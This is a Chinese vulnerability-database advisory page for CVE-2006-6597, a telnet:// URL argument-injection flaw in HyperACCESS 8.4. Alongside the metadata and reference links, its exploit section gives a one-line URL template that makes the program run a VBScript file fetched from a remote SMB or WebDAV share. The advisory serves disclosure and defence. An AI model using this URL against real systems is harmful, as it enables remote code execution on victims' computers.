Hyper Access Telnet URL协议恶意脚本任意vbscript代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111771 漏洞类型 设计错误
发布时间 2006-12-14 更新时间 2007-06-27
CVE编号 CVE-2006-6597 CNNVD-ID CNNVD-200612-350
漏洞平台 Windows CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/29281
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-350
|漏洞详情
HyperACCESS是HyperTerminal的官方升级,可为用户提供终端通讯解决方案。HyperAccess中存在参数注入漏洞,以要求URL协议处理telnet://URL控制程序。HyperAccess会接受/r为命令行参数指定将要运行的脚本文件,可使用类似于以下的URL通过InternetExplorer将该命令传送给URL:telnet://IPADDRESS:PORT#/r\\SERVER\share\scriptfile.txt,如果SERVER为包含有恶意脚本的SMB共享或WEBDAVWeb共享的话,就会导致执行任意vbscript代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/21594/info

Hilgraeve HyperACCESS is prone to multiple remote command-execution vulnerabilities. 

Attackers can exploit these issues to execute arbitrary application commands with the privileges of the affected application. A successful exploit could result in the compromise of affected computers.

Version 8.4 is vulnerable to these issues; prior versions may also be vulnerable.

telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt
|参考资料

来源:BID
名称:21594
链接:http://www.securityfocus.com/bid/21594
来源:BUGTRAQ
名称:20061214HyperAccess-MultipleVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/454388/100/0/threaded
来源:VUPEN
名称:ADV-2006-5013
链接:http://www.frsirt.com/english/advisories/2006/5013
来源:SECUNIA
名称:23366
链接:http://secunia.com/advisories/23366
来源:SREASON
名称:2045
链接:http://securityreason.com/securityalert/2045